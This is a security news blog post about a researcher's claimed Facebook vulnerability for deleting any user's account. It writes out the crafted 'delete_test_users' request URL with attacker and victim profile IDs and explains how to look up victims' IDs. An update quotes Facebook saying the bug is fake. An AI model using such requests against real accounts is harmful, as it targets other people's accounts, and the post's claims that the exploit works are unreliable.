SHARE

UPDATE: The Vulnerability Ehraz Ahmed found was FAKE, Facebook says to computer world:

This is not a real bug. We’ve audited our code to verify that there’s no variant of the proposed exploit that works against this endpoint or any other that we’ve found. Furthermore, we’ve verified in our logs that the ‘test account’ being used in the demonstration video was manually deactivated by visiting https://www.facebook.com/deactivate.php.”

A security researcher from INDIA named Ehraz Ahmed claims that he found a vulnerability by which anyone could use that to delete any Facebook account, he sent an email to us about his latest BUG.

Here is the complete process, he used to delete a facebook account:

Vulnerable Link:

https://www.facebook.com/ajax/whitehat/delete_test_users.php?
fb_dtsg=AQA1E-WE&selected_users[0]=[Victems Profile ID]&__user=[Attackers Profile ID]&__a=1

We can get the profile id by using
http://graph.facebook.com/[username]

Here [username] indicates the username of your facebook profile!

In this Demo we will be using a test profile
Name: Rahul Agnikotri
https://www.facebook.com/hexgroup ( Victems profile) ( this is my test profile)

We can remove any account in Facebook even it is of Mark Zuckerberg or any celebrity

  • Attackers profile id = 1781913563

  • Victems profile id = 100001831297334


https://www.facebook.com/ajax/whitehat/delete_test_users.php?
fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1

He also uploaded a Video Demonstration of this Vulnerability:

Remote Facebook Account Exploit from Ehraz Ahmed on Vimeo.

He also reported that to Facebook and seems to be recovered at this time. After he reported this harmful BUG to facebook, they replied him that “The bug only works for test accounts” but we also checked out the cache version of the account he deleted and found that the account was not a test one, Ahmed (Security Researcher) also told us the account he deleted was 2 years old.

Last Month a researcher from Palestine hacked Mark Zuckerberg’s timeline to report a BUG and he was also one of them who was not awarded by Facebook because he violated the Terms by hacking Zuckerberg’s timeline.

1 COMMENT

LEAVE A REPLY

This site uses Akismet to reduce spam. Learn how your comment data is processed.